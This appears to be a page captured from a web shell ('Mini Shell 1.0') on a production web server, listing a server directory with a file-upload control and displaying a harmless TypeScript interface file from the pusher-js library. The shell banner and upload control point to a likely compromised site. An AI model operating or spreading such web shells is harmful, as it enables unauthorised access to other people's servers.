HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/negocios.lapieza.do/node_modules/pusher-js/src/core/auth/
Upload File :
Current File : /var/www/negocios.lapieza.do/node_modules/pusher-js/src/core/auth/auth_transports.ts
import AbstractRuntime from '../../runtimes/interface';
import { AuthRequestType, InternalAuthOptions } from './options';

interface AuthTransport {
  (
    context: AbstractRuntime,
    query: string,
    authOptions: InternalAuthOptions,
    authRequestType: AuthRequestType,
    callback: Function
  ): void;
}

interface AuthTransports {
  [index: string]: AuthTransport;
}

export { AuthTransport, AuthTransports };